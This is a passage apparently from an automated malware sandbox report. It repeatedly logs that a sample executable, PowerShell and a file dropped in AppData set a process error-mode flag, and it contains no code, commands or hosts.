                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
